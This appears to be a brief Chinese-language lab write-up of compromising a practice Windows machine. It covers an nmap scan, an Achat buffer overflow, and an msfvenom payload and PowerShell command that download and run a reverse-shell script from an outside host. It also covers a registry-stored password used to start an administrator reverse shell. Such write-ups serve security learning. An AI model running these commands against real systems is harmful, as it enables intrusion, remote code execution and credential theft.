基本信息

端口扫描

需要UDP全端口,非常见端口9255和9256:

1
2
3
4
5
6
7
8
9
10
11
$ sudo nmap -sU -p9255,9256 10.10.10.74
Password:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 14:29 CST
Nmap scan report for 10.10.10.74
Host is up (0.084s latency).

PORT STATE SERVICE
9255/udp open|filtered mon
9256/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds

9256

搜索相关资料,这是Achat端口:

Achat bof

exploit

msf里的模块打到的meterpreter几秒后就会断,加上auto migrate也一样:

Powershell

执行方式换成powershell reverse就可以,比较稳定:

1
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:7777/Invoke-PowerShellTcp.ps1')" 。。。

user flag

alfred用户桌面得到user flag:

提权信息

预期

powerup可以发现注册表中的密码

1
2
3
4
5
6
7
8
9
10
11
12
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:7777/PowerUp.ps1')
Invoke-AllChecks

[*] Checking for Autologon credentials in registry...


DefaultDomainName :
DefaultUserName : Alfred
DefaultPassword : Welcome1!
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :

这个密码就是管理员密码

非预期

权限配置错误,Alfred对root.txt没有权限,但对Desktop有权限:

提权 && root flag

icacls

直接修改权限后读取root.txt:

Administrator

使用密码得到Administrator session,执行reverse shell:

1
2
3
$passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential('administrator',$passwd);
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.6:7777/Invoke-PowerShellTcp.ps1')" -Credential $creds

参考资料